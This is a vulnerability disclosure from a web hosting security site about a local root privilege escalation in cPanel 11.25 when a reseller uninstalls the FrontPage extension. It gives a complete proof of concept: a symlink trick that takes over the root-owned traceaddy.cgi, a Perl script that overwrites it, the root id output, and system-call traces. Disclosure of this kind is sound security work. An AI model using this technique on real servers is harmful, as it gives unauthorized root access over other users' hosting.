WebhostSecurity.com
ARTICLES
› Lessons Learned - Defense
› Lessons Learned - Offense
› Finding Bugs 1 - Softaculous
› Finding Bugs 2 - cPanel + Horde
› uid/gid Reuse Multi Vendor Issue
› Finding the WordPress 2.1.1 Backdoor
› Discovering Cdorked.A on cPanel
OFFENSE
› AtMail
› BFD
› cPanel
› CSF
› DirectAdmin
› Installatron
› Juniper
› Kloxo
› OSSEC
› Softaculous
› WHMEZLogin
› WHMReseller
DEFENSE
› STFN - Suspicious /tmp File Notifier
› ELM - Exim Log Monitor
› RFID - Remote File Inclusion Detector
› Twitter


cPanel 11.25.0-E44589 - Local root privilege escalation when uninstalling FrontPage extension


DESCRIPTION

Resellers with permissions to add and remove FrontPage extensions could escalate their privileges to root when uninstalling FrontPage. We'll use the username user1 in the example below, and will take ownership of cPanel's traceaddy.cgi file, owned by root:root by default:

[user1@host]$ cd /home/user1/public_html/_vti_pvt
[user1@host]$ rm -f frontpg.lck
[user1@host]$ ln -s /usr/local/cpanel/whostmgr/docroot/cgi/traceaddy.cgi frontpg.lck

Now user1 owns the traceaddy.cgi file, which has been completely emptied. user1 can write to it, and execute it via WHM:

[user1@host ~/public_html/_vti_pvt]$ cat > /usr/local/cpanel/whostmgr/docroot/cgi/traceaddy.cgi << EOF
> #!/usr/bin/perl
> print "Content-type: text/plain\r\n\r\n";
> system("/usr/bin/id");
> EOF


https://x.x.x.x:2087/cgi/traceaddy.cgi
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


chown32() running as root against a user controlled file:

open:3171:11712    open("/home/user1/public_html/_vti_pvt/frontpg.lck", O_WRONLY|O_CREAT, 0666) = 4
stat64:3177:11712  stat64("/home/user1/public_html/_vti_pvt/frontpg.lck", {st_mode=S_IFREG|0666, st_size=0, ...}) = 0
chown32:3182:11712 chown32("/home/user1/public_html/_vti_pvt/frontpg.lck", 1259, 99) = 0
unlink:3767:11715  unlink("frontpg.lck")             = 0


rename() running as root against a user controlled file:

open:3241:11712    open("/home/user1/public_html/_vti_pvt/.services.org.tmp", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 6
lstat64:3244:11712 lstat64("/home/user1/public_html/_vti_pvt/.services.org.tmp", {st_mode=S_IFREG|0644, st_size=2, ...}) = 0
rename:3245:11712  rename("/home/user1/public_html/_vti_pvt/.services.org.tmp", "/home/user1/public_html/_vti_pvt/services.org") = 0


IMPACT

Resellers could get root access.

WebhostSecurity.com © 2009 - 2020